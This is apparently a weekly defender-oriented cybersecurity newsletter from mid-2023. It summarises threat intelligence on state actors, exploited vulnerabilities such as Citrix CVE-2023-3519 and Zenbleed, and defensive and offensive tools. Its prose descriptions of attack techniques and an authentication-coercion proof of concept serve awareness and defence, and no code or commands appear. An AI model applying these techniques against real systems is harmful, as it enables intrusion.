Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.

Operationally this week the understand and implications of the Exchange online compromise continues. Details such as the U.S. Ambassador to China Hacked in China-Linked Spying Operation came to light, then we had the letter from Ron Wyden to CISA. Beyond that we have the MobileIron vulnerability which was used to attack the Norwegian Government - 12 ministries thus far. This is in addition to the Citrix exploitation (see below). Finally, VirusTotal apologized for leaking some customer information.

In the high-level this week:

• FACT SHEET: Biden-Harris Administration Secures Voluntary Commitments from Leading Artificial Intelligence Companies to Manage the Risks Posed by AI - The companies commit to internal and external security testing of their AI systems before their release. This testing, which will be carried out in part by independent experts, guards against some of the most significant sources of AI risks, such as biosecurity and cybersecurity, as well as its broader societal effects.

  • Blueprint for an AI Bill of Rights - Systems should undergo pre-deployment testing, risk identification and mitigation, and ongoing monitoring that demonstrate they are safe and effective based on their intended use, mitigation of unsafe outcomes including those beyond the intended use, and adherence to domain-specific standards.

  • In response - the Rise of the AI Red Teams - I covered NVIDIA’s previously, but have included again below - this week we saw Google announce theirs - expect more vendors/service providers to emulate.

    • Google's AI Red Team: the ethical hackers making AI safer

    • NVIDIA AI Red Team: An Introduction

• CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments - based on 121 Risk and Vulnerability Assessments by CISA.

  • Evolving CDM to Transform Government Cybersecurity Operations and Enable CISA’s Approach to Interactive Cyber Defense - CDM is no longer a static effort to standardize agency capabilities and collect cybersecurity information, but rather the U.S. government’s cornerstone for proactive, coordinated, and agile cyber defense of the federal enterprise. 

• CERT EU Threat Landscape Report Q2 2023 - In Q2 2023, we analysed 151 malicious activities of interest targeting EU institutions, bodies, and agencies (EUIBAs) or their vicinity, and we released 39 Threat Alerts. When known, the main motive of the attackers was cyberespionage - 63% of the cases

• 'Malware' in government-supplied Chinese equipment... South Korean National Intelligence Service 'Complete Investigation' - Malicious code was found in Chinese measuring equipment supplied to government agencies. The National Intelligence Service believed that the malicious code was delivered installed on Chinese equipment, and decided to investigate all Chinese equipment that had been supplied to government agencies.

• Australia Supports a Cyber Secure Samoa - Australia continues to support Samoa’s cyber aspirations, including through support for MCIT’s SamCERT Division since its establishment in 2019.  SamCERT is Samoa’s National Cyber Security Agency that provides awareness and support to Samoans and local organisations to be better able to respond to cybersecurity threats and incidents.

• City of London Police Annual Report 2022-23 - Police Cyber Alarm has over 6,000 members and is now live in 42 police forces in England and Wales and Northern Ireland. During the past 12 months we have:

  • Identified 395 million suspicious incidents

  • Completed over 60,000 vulnerability scans on member organisations’ websites

  • On external networks identified 2,200 high risk, 14,200 medium risk and 3,380 low risk OPERATION HENHOUSE vulnerabilities.

• Costa Rica’s Position On The Application Of International Law In Cyberspace - Costa Rica believes that existing international law applies in its entirety to ICTs, just as it does to all other technologies. With regard to the prohibition on the use of force and the rules of international humanitarian law, the International Court of Justice (ICJ) has held that these rules apply ‘to all forms of warfare and to all kinds of weapons, those of the past, those of the present and those of the future’.

• Services secrets : les espions entrent à l'université - discusses the first academic journal in France on intelligence and cyber called Intelligence and Cyber French Studies.

• Global head of cyber on the “incredible opportunity” facing the sector - Newman noted that this is playing out against the backdrop of cyber being poised to soon become much more prevalent in a range of different ways. Penetration rates for standalone cover may remain stubbornly low within the class, he said, but these are set to expand materially, particularly as capacity providers start to gain momentum in new areas such as personal lines cyber – and as business lines such as motor, shipping and aviation start to develop as cyber classes of business.

• Russian spyware billionaire, 40, dies from ‘medical gas’ - A 40-year-old Russian tech entrepreneur who bolstered President Putin’s domestic mass-surveillance operations was found dead over the weekend, having allegedly overdosed on “medical gas”.

• Information Security and Cybersecurity Management: A Case Study with SMEs in Portugal - the observed improvements must be emphasised, especially on those enterprises that adhered to Type 2 auditing. Nevertheless, without having a second auditing, SMEs that intervened with Type 1 auditing had the opportunity to evaluate 30 controls and, for those, to apply the corresponding mitigation tasks.

• Why Do SBOM Haters Hate? Or Why Trade Associations Say the Darndest Things - a punchy piece from the Atlantic Council

• The Dramatic Cyberattack That Put Latin America on Alert - insight into the ransomware impact in the global south.

• Artificial Intelligence

  • Adversarial Policies Beat Superhuman Go AIs - We attack the state-of-the-art Go-playing AI system KataGo by training adversarial policies against it, achieving a >97% win rate against KataGo running at superhuman settings. Our adversaries do not win by playing Go well. Instead, they trick KataGo into making serious blunders - the blunting of AI.

  • “Isaac Newton to AI” Remarks before the National Press Club - speech by the SEC on the market risks stemming from AI.

• Cybercom nominee plans to work with services on ‘expeditionary’ cyber forces - “Expeditionary cyber forces have already demonstrated potential to extend the reach of cyber enabling activities and close the gaps that limit cyber forces’ ability to access important tactical targets in forward locations,”

• Assessing Political Motivations Behind Ransomware Attacks - study involved data about 4,194 victims from 55 ransomware groups in period May 2019 through April 2022

• Ransom Monetization Rates Fall to Record Low Despite Jump In Average Ransom Payments - fell to a record low of 34%.

• The final OEWG draft second annual progress report is out - Valentin Weber provides this uber helpful drafting tool to see the differences

Reflections this week come from learning about Monash University-led research into growing human brain cells onto silicon chips, with new continual learning capabilities. Last year these human brain cells were taught to play pong in about five minutes! A future with these hybrid organic and silicon systems is increasingly looking likely in our lifetime. How we will gain assurance as to their cyber resilience is going to be a voyage of discovery for us all, especially when our traditional silicon systems are having vulnerabilities found in them today. Excuse me whilst I brush off by high school level biology..

On the interesting job/role front (thanks to those sending me these):

• Research Associate in Cyber Diplomacy at Kings College London, UK

• Staff Threat Intelligence Analyst at Google in Reston, VA, USA

• Email Security Researcher at Microsoft in Multiple Locations, USA

• Senior Email Security Researcher at Microsoft in Multiple Locations, USA

• Principal Email Security Researcher at Microsoft in Multiple Locations, USA

• Professor of Cybersecurity at The Middlebury Institute of International Studies at Monterey (MIIS), Monterey, CA, USA

• Head of Cyber Operations at The Crown Estate, Hybrid, UK

• Director of Science and Innovation-Fundamental Research, The Alan Turing Institute, UK

Enjoying this? don’t get via e-mail? Subscribe:

Think someone else would benefit? Share:

Share

Have a lovely Friday

Ollie

Cyber threat intelligence

Who is doing what to whom and how.

Russia

APT29 recently faked the German embassy and issued a malicious PDF file

Chinese reporting on Russian activity. The tradecraft shows a degree of sophistication by the use of HTML smuggling, yet the delivery mechanism is rather basic.

Recently, we once again captured APT29's attack activity impersonating the German embassy. The attack flow of the activity is roughly as follows:

1.  The email attachment is a PDF file containing HTML code, and the zip file will be released locally after running;

2.  The zip file contains an HTA file with the same name. After running, it releases white files, malicious DLL files and decoy files locally;

3.  After the malicious DLL file is loaded, it will connect to the API interface of the open source chat software Zulip for data transmission, and obtain subsequent loads for local execution.

https://mp-weixin-qq-com.translate.goog/s?__biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp

North Korea

Various tactical reporting omitted this week which can be found on the subreddit.

North Korean Hacker tries to get job

A mixed bag in this reporting on North Korean activity. They continue to try and get gainful employment in order to get paid, however allegedly in this instance it wasn’t their only intent.

He even wrote a hiring contract, but he was a 'North Korean hacker' who washed his identity - tried to get a job in a South Korean energy company's overseas branch - "North Korea continues to earn illegal IT foreign currency by mobilizing new methods

https://mobile-newsis-com.translate.goog/view.html?ar_id=NISX20230719_0002382536&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp

June’s npm Attack Attributed to North Korea

Two bits of reporting on this campaign where North Korea appears to be pushing into open source supply chain in order to get their initial access. Whilst not a novel approach the fact it is now in an attributed manner being utilized by this particular nation state should be of note and concern.

https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/

https://blog.phylum.io/junes-sophisticated-npm-attack-attributed-to-north-korea/

Analysis of APT-C-28 (ScarCruft) organization launching Rokrat backdoor activities in the direction of energy

Chinese reporting on something we have previously covered yet is worth re-highlighting. North Korea are using large files in an effort to avoid being detected by scanning solutions.

The attacker fills the LNK file with a large amount of junk data to make the file reach 40MB+ in size, and embeds a decoy PDF document in the LNK file to use PowerShell to land and open the PDF file.

https://mp-weixin-qq-com.translate.goog/s?__biz=MzUyMjk4NzExMA%3D%3D&mid=2247492864&idx=1&sn=0af3b744c9d5deeb1697ce2a3565624b&chksm=f9c1d609ceb65f1f62c856e57004fe90fe059d688a7a858b483208cfe832b3d5ab77d13f3f1e&scene=178&cur_album_id=1955835290309230595&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#rd

China

Pro-PRC HaiEnergy Campaign Exploits U.S. News Outlets via Newswire Services to Target U.S. Audiences;

Ryan Serabian, Daniel Kapellmann Zafra, Conor Quigley and David Mainor outline an information operation which utilizes the systems of the west against itself.

we have identified new tactics, techniques, and procedures (TTPs) being employed by HaiEnergy, which includes the use of newswire services to distribute pro-PRC content to subdomains of legitimate U.S.-based news outlets. We also note the possibility the campaign is leveraging less conventional TTPs, citing a specific example in which an ad displaying pro-PRC messaging was possibly placed on a billboard in New York City’s Times Square.

https://www.mandiant.com/resources/blog/pro-prc-haienergy-us-news

Common TTPs of attacks against industrial organizations. Implants for remote access

Kirill Kruglov, Vyacheslav Kopeytsev and Artem Snegirev detail a campaign from last year which looks like it was undertaken by China.

In 2022 we investigated a series of attacks against industrial organizations in Eastern Europe. In the campaigns, the attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems.

Based on similarities found between these campaigns and previously researched campaigns (e.g., ExCone, DexCone), including the use of FourteenHi variants, specific TTPs and the scope of the attack, we have medium to high confidence that a threat actor called APT31, also known as Judgment Panda and Zirconium, is behind the activities described in this report.

https://ics-cert.kaspersky.com/publications/reports/2023/07/20/common-ttps-of-attacks-against-industrial-organizations-implants-for-remote-access/

Iran

Nothing this week

Analysis of SideCopy's attack activities targeting Indian government departments

Pakistani operations using topical news items in order to launch their campaigns in this Chinese reporting. The tradecraft we’ve already covered in the North Korean reporting above.

In this round of attacks, the SideCopy organization used the malicious compressed package as the attack entry as always. The compressed package contained malicious LNK, and used various induced file names, such as "Violance Against Women.docx.lnk", the sample After running, it will release the disguised content and load its malicious code.

https://mp-weixin-qq-com.translate.goog/s/qkWD_X3aFPURThJqu7lbvg?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp

First Known Targeted OSS Supply Chain Attacks Against the Banking Sector

Tzachi Zornstein, Aviad Gershon and Yehuda Gelb detail a campaign that if verified is an interesting example of the new world of hybrid social engineering and third party software component service misuse. Will be interesting to see how the financial services sector responds here.

• In the first half of 2023, [our] Supply Chain research team detected several open-source software supply chain attacks that specifically targeted the banking sector.

• These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it.

• The attackers employed deceptive tactics such as creating fake LinkedIn profile to appear credible and customized command and control (C2) centers for each target, exploiting legitimate services for illicit activities.

On the 5^th and 7^th of April, a threat actor leveraged the NPM platform to upload a couple of packages containing within them a preinstall script that executed its malicious objective upon installation.

Interestingly, the contributor behind these packages was linked to a LinkedIn profile page of an individual that was posing as an employee of the targeted bank.

The attacker cleverly utilized Azure’s CDN subdomains to effectively deliver the second-stage payload. This tactic is particularly clever because it bypasses traditional deny list methods, due to Azure’s status as a legitimate service.

https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/

Conti and Akira: Chained Together

What happened to Conti you ask? Well Steven Campbell, Akshay Suthar and Connor Belfiore give us a hint. The fact they are focused on SMBs is of note.

• Since March 2023, Akira ransomware has compromised at least 63 victims with approximately 80% of them being small to medium-sized businesses (SMBs).

• We assess Akira is likely an opportunistic ransomware group due to their victimology and negotiation tactics.

• Through blockchain analysis, we assess with a high degree of confidence that some Conti-affiliated threat actors are linked to the Akira ransomware group.

https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/

Discovery

How we find and understand the latent compromises within our environments.

Okta Logs Decoded: Threat Hunting Guide

Ori Amiga and Ron Marom provide a useful guide and tooling to help for those who have deployed Okta and want to detect misuse.

We’ll explore:

• Each Okta audit log, learning how to analyze and extract critical information from

• How to uncover hidden threats, analyze their patterns, and respond effectively. From detection of brute force and MFA fatigue attempts to impossible traveler and privilege escalation techniques

• A set of free tools the Rezonate team has provided you to collect, analyze, hunt, and detect identity threats faster and easier.

https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting

Defence

How we proactively defend our environments.

timesketch: Collaborative forensic timeline analysis

A mature project here from Google which is worth highlighting for a variety of cyber use cases.

Timesketch is an open-source tool for collaborative forensic timeline analysis. Using sketches you and your collaborators can easily organize your timelines and analyze them all at the same time. Add meaning to your raw data with rich annotations, comments, tags and stars.

https://github.com/google/timesketch

Prefetch: The Little Snitch That Tells on You

Shane Hartman provides a guide as to the value of this information source in understanding what happened on Windows hosts.

The prefetch file, while not intended for analysis, can provide a wealth of information for an investigator. When opened, a prefetch file can show:

• Creation date – timestamped with the local time of the machine

• Date/time of last execution time – timestamped with the local time of the machine

• Run count – the number of times the executable has been launched

• Other run times – limited to the previous eight (8) executions

• Directories and files referenced – includes other executables

• Volumes and file paths – the location from which files were accessed

https://www.trustedsec.com/blog/prefetch-the-little-snitch-that-tells-on-you/

Vulnerability

Our attack surface.

CVE-2023-3519: Citrix ADC Gateway RCE

This has been a painful week for this vulnerability.

DHS Advisory on Citrix exploitation CVE-2023-3519

In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.

The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.

This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise.

http://go.dhs.gov/4te

commercial reporting

https://blog.assetnote.io/2023/07/21/citrix-CVE-2023-3519-analysis/

https://blog.assetnote.io/2023/07/24/citrix-rce-part-2-cve-2023-3519/

https://bishopfox.com/blog/citrix-adc-gateway-rce-cve-2023-3519

Accurately fingerprint and detect vulnerable (and patched!) versions of Netscaler / Citrix ADC to CVE-2023-3519

Bryan Smith provides a tool to understand global exposure.

The cve_2023_3519_inspector.py is a Python-based vulnerability scanner for detecting the CVE-2023-3519 vulnerability in Citrix Gateways. It performs a passive analysis and fingerprinting of target websites to assess their vulnerability based on a series of checks.

https://github.com/securekomodo/citrixInspector

Zenbleed: all AMD Zen 2 class processors affected

Tavis Ormandy continues to pioneer and details a vulnerability which is going to need some IaaS providers respond. There are likely more of these types of issues lurking..

It turns out that with precise scheduling, you can cause some processors to recover from a mispredicted vzeroupper incorrectly!

This technique is CVE-2023-20593 and it works on all Zen 2 class processors, which includes at least the following products:

• AMD Ryzen 3000 Series Processors

• AMD Ryzen PRO 3000 Series Processors

• AMD Ryzen Threadripper 3000 Series Processors

• AMD Ryzen 4000 Series Processors with Radeon Graphics

• AMD Ryzen PRO 4000 Series Processors

• AMD Ryzen 5000 Series Processors with Radeon Graphics

• AMD Ryzen 7020 Series Processors with Radeon Graphics

• AMD EPYC “Rome” Processors

The bug works like this, first of all you need to trigger something called the XMM Register Merge Optimization², followed by a register rename and a mispredicted vzeroupper. This all has to happen within a precise window to work.

https://lock.cmpxchg8b.com/zenbleed.html

AWS has released their response

https://aws.amazon.com/security/security-bulletins/AWS-2023-004/

BMC&C: Lights Out Forever

Nate Warfield, Scott Scheferman and Vlad Babkin detail vulnerabilities which could brick data centers and/or be used to go under up the hosts and hypervisors which run on the machines in question.

The vulnerabilities discovered are addressed by the following CVEs:

• CVE-2023-34329 – Authentication Bypass via HTTP Header Spoofing

• CVE-2023-34330 – Code injection via Dynamic Redfish Extension interface

The impact of exploiting these vulnerabilities includes remote control of compromised servers, remote deployment of malware, ransomware and firmware implanting or bricking motherboard components (BMC or potentially BIOS/UEFI), potential physical damage (over-voltage / bricking), and indefinite reboot loops that a victim cannot stop.

https://eclypsium.com/research/bmcc-lights-out-forever/

A new type of DDoS attack? Research on DDoS reflection amplification attack based on QUIC protocol

Chinese reporting on a protocol amplification attack which could cause some headaches.

[Our] team found through research that there are actually a large number of QUIC servers that can be used for reflection amplification in the existing network, and the number of reflectors and the amplification factor are very considerable, and the amplification factor can reach up to 250 times. QUIC reflection attacks may be on stage in the not-too-distant future.

https://translate.google.com/translate?sl=auto&tl=en&hl=en&u=https://mp.weixin.qq.com/s/2cdCP40vHwStUkIsZ2scjw&client=webapp

Offense

Attack capability, techniques and trade-craft.

WSPCoerce: PoC to coerce authentication from Windows hosts using MS-WSP

Simon Lemire provides a tool which no doubt some actors will find enterprising ways to leverage as they latterly move around estates.

It's a tool to interact with remote hosts using the Windows Search Protocol and coerce authentication. The target host will connect over SMB to the listener host using the machine account.

Requirements:

• Must be running in the context of a domain user (no specific privileges required on target system AFAIK)

• 445/TCP open on the target system

• 445/TCP open on the listener system

• Windows Search Service running on the target system

Note: The Windows Search Service is NOT enabled by default on Windows Server so in practice this attack is only effective against Windows workstations.

https://github.com/slemire/WSPCoerce

Beyond File Search: A Novel Method for Exploiting the "search-ms" URI Protocol Handler

Mathanraj Thangaraju and Sijo Jacob detail an attack technique which is really quite clever as a technique in order to appear legitimate.

During an attack leveraging the “search” / “search-ms” URI protocol handler, threat actors may create deceptive emails containing hyperlinks or email attachments that redirect users to compromised websites. When users visit the website, malicious Java scripts initiate searches on a remote server using the “search” / "search-ms" URI protocol handler. The search results of remotely hosted Malicious shortcut files are displayed in Windows Explorer disguised as PDFs or other trusted icons, just like local search results. This smart technique conceals the fact that the user is being provided with remote files and gives the user the illusion of trust. As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.

https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html

SaaS attack techniques

Luke Jennings details how in a SaaS first world there is a parallel ATT&CK framework (full disclosure: I invest in them).

This repository is a collection of SaaS-specific attack techniques. It is intended to be a resource for security researchers, red/blue teams, and penetration testers to learn about and share SaaS attack techniques.

Quick note: we wanted to start sharing as early as possible, so this is very much a work in progress. Hopefully there is enough to see the shape of things to come, but no doubt there are gaps - we'll be filling them in over the coming weeks and months. If you can help fill in some references, add examples, or point us to missing techniques - please open an issue (or even a PR)! We'll be very sure to credit you.

For more information on the background to this project, check the following blog post

https://github.com/pushsecurity/saas-attacks

Exploitation

What is being exploited.

CVE-2023-3519: Exploitation of Citrix Zero-Day by Possible Espionage Actors

James Nugent, Foti Castelan, Doug Bienstock, Justin Moore and Josh Murchie detail the Citrix exploitation from their perspective. If there were any doubts as to China’s capability

During analysis of the compromised appliance, [we]identified a simple PHP eval web shell located in /var/vpn/themes. The web shell had the earliest file system modified time of all the identified malware and was relatively compact (113 bytes). As a result, Mandiant assessed with moderate confidence that the web shell was placed on the system as part of the initial exploitation vector. 

https://www.mandiant.com/resources/blog/citrix-zero-day-espionage

CVE-2023-35078 - Remote Unauthenticated API Access Vulnerability in MobileIron Core / Ivanti Endpoint Manager Mobile

This is the vulnerability used to compromise the Norwegian Government. The vulnerability it self was trial to discover and exploit implying the product hadn’t been recently security tested.

https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability?language=en_US

MOVEit Vulnerability Investigations Uncover Additional Exfiltration Methodox

Devon Ackerman, Steven Coffey, Josh Mitchell and Dan Cox provide details on how to detect a second means of data exfiltration.

[We] identified two different file exfiltration methodologies leveraged by threat actors, primarily CLOP, during recent engagements involving the exploitation of the MOVEit vulnerability (CVE-2023-34362) throughout May and June 2023.

..

Method 2 exfiltration may have occurred if hundreds, thousands or tens of thousands of GET and POST requests have been made by the same IP address to the web shell over the course of hours or days. 

https://www.kroll.com/en/insights/publications/cyber/moveit-vulnerability-investigations-uncover-additional-exfiltration-method

MOVEit hack victim list

Bert Kondruss makes various corporate communications teams go to battle stations. The scale in literal victims as well as potential GDPR exposure here is monumental.

Number of known victims of the MOVEit attack so far:

• 522 organizations

• 32 - 35 m individuals

https://konbriefing.com/en-topics/cyber-attacks-moveit-victim-list.html

Tooling and Techniques

Low level tooling and techniques for attack and defence researchers…

nothing this week

Footnotes

Some other small (and not so small) bits and bobs which might be of interest.

• Aggregate reporting

  • Intelligence Insights: July 2023

  • DDoS threat report for 2023 Q2

  • APT trends report Q2 2023

  • The Ups and Downs of 0-days: A Year in Review of 0-days Exploited In-the-Wild in 2022

  • VirusTotal Malware Trends Report: Emerging Formats and Delivery Techniques

• Artificial intelligence

  • Foreign Ministries and Cyber Power: Implications of Artificial Intelligence

  • Jina Embeddings: A Novel Set of High-Performance Sentence Embedding Models

  • Ethical Governance of Artificial Intelligence for Defence: Normative Tradeoffs for Principle to Practice Guidance - we outline the key normative choices and corresponding tradeoffs that are involved in specifying guidance for the implementation of AI ethics principles in the defence domain

  • Adversarial Policies Beat Superhuman Go AIs - I know I included this at the top, but just be sure everyone reads it.

• It’s more than just money: The real-world harms from ransomware attacks

• Dead Man's PLC: Towards Viable Cyber Extortion for Operational Technology